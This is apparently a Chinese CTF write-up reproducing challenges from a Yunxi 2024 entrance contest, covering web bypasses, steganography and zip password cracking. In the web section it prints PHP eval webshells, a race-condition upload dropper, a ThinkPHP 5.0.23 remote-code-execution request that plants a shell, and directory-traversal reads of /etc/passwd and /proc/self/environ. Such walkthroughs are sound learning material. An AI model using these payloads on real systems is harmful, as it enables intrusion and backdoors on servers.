云曦2024秋季开学考复现(部分)

ezezssrf

第一层是一个md5的弱比较，可以用数组绕过

看到已经绕过

第二层这里有string，所以不能用数组绕过，可以通过一组不同字符但是翻译过来相同的绕过

eg.TEXTCOLLBYfGiJUETHQ4hAcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak与TEXTCOLLBYfGiJUETHQ4hEcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak

来到下一层

这里的意思是这个传参不能排在第一位，不然会=0，直接在后面传就可以了

可以看到绕过了

第四层是一个ssrf漏洞，可以通过@绕过

也成功绕过

最后这里是rce无回显，可以用tee命令先传到一个文件里再直接访问文件

得到flag

小小py

打开可以看到拥有的钱不够买flag

查看源码没发现什么，随便点击一个图片发现能够下载

bp抓包可以发现图片下载路径，然后利用目录穿越查看/etc/passwd发现成功回显

补充：

目录遍历（目录穿越）是一个Web安全漏洞，攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。 这可能包括应用程序代码和数据，后端系统的登录信息以及敏感的操作系统文件。

在Windows操作系统上， ../ 和 ..\ 都是返回上一级的语句。

目录穿越/遍历漏洞 -- 学习笔记_目录遍历漏洞描述-CSDN博客

发现可以成功回显，接下来查看当前进程运行的环境变量/proc/self/environ

得到flag

你能跟上我的speed吗

打开是文件上传，先随便传个马看看

联想到文件上传的条件竞争

上传文件写入一句话木马：

<?php $op=fopen("shell.php","a+");fwrite($op,'<?php @eval($_POST[cmd]);?>');fclose($op);echo(333) ?>

再次上传时用bp抓包

发送到爆破模块后，不用设置参数，然后选null payloads和无限循环抓包

接下来抓包上传文件地址，也是像上面一样设置

然后两个一起爆破，当文件上传页面爆破到333时停止

发送到重放器，改为shell.php

蚁剑连接测试成功

得到flag

学习高数

打开就一个这种界面，先拿御剑扫描一下

根据扫描结果和提示来看应该是需要爆破出正确界面

抓包并设置爆破数值

根据长度查看界面，找出不一样的那一个

访问cvFXZohgjf.php

打开看到第二个界面，这里是GET传参GS限制了payload长度，并且过滤了很多字符，后面只知道可以用异或具体用法不清楚，看了wp

得到flag，这题环境的动态flag有问题，最后就是这种

真正的hacker！

打开后看到thinkphp，发现只是5.0，传参

得到具体版本v5.0.23，然后去搜索这个版本有什么漏洞

发现是远程命令执行，可以参考这篇博客

Thinkphp5.0.23远程代码执行漏洞复现_thinkphp v5.0.23-CSDN博客

得到当前路径下的目录

查看当前路径下所有文件，发现又uploads文件，尝试写入一个php木马，访问这个页面

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '<?php eval($_POST[cmd]); ?>' > var/www/public/uploads/shell.php

连不上，应该存在过滤，尝试换用base64的方法

然后蚁剑连接

在文件中找到两个flag

misc大杂烩

打开可以知道flag又六个考点拼接而来，第一个是一张图片

用水印工具打开后可得到第一部分的flag

flag1{hdy12-

第二段是一个word文档，隐藏文字

全选，在字体中取消勾选隐藏文字

得到第二部分flag  flag2{1yhgzc5-

第三部分是一个压缩包，打开看到最前面说这是个png文件，后面又提示base64，直接转图片

得到一个二维码

草料二维码解码得到第三段flag

flag3{Ypt0a2-

考点四是一段音频，用deepsound打开

在1.txt中找到第四段flag

flag4{ghj8-

第五段是一个压缩包

发现解压需要密码

根据提示推测密码形式为197.157.xx.xx或197.157.xxx.xxx

通过掩码攻击得到解压密码，打开后获得的内容用埃特巴什码解码得到flag

flag5{7ugak-

补充：

Zip密码爆破
爆破:逐个尝试所有密码，直到遇到正确密码
字典:字典攻击的效率比爆破稍高，因为字典中存储了常用的密码，因此就避免了爆破时把时间浪费在无用的密码上。
掩码攻击:如果已知密码的某几位，如已知8位密码的第4位是Z，那么可以构造xxxxzxxxx进行掩码攻击，掩码攻击的原理相当于构造了第4位为Z的字典，攻击效率也比逐个尝试的爆破方式高。

第六段

用010打开，看出来是一个16进制颠倒，使用python脚本倒转

然后修改后缀为zip，解压后得到第六段flag

flag6： 78uiag}

最后拼起来就是Yunxi{hdy12-1yhgzc5-Ypt0a2-ghj8-7ugak-78uiag}

MISC1

发现很规律，查看一下

最后一个字符拼起来刚好是flag，接下来只要拼完就可以了

最后是flag{7823yed-3892hu-7euiwb-euwidbh82-7ueidw}